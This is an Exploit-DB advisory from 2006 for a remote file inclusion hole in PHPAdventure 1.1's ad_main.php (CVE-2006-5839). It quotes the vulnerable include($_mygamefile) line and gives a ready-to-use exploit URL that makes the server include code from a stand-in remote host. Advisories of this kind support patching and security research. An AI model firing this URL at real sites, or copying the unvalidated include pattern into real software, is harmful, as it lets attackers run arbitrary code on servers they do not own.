PHPAdventure 1.1 ad_main.php Remote File Include Vulnerability

2006-11-07T00:00:00
ID EDB-ID:2736
Type exploitdb
Reporter HER0
Modified 2006-11-07T00:00:00

Description

PHPAdventure 1.1 (ad_main.php) Remote File Include Vulnerability. CVE-2006-5839. Webapps exploit for php platform

                                        
                                            *********************************************
D.O.M TEAM
Bug found: HER0
cms: PHPAdventure
type: rfi
risk: High
download:http://prdownloads.sourceforge.net/phpadventure/phpadv11.tar.gz
contac:16.her0@gmail.com
nota: all the versions of PHPAdventure is affected..
********************************************
line of the code:

<?php
$_stage = 1;
include($_mygamefile);
?>

exploit:
/ad_main.php?_mygamefile=http://evilcode.txt?
****************************************************************
www.domteam.info

greetz:Sponge Bob,Bob esponja XDDDD...
******************************************************************************************

# milw0rm.com [2006-11-07]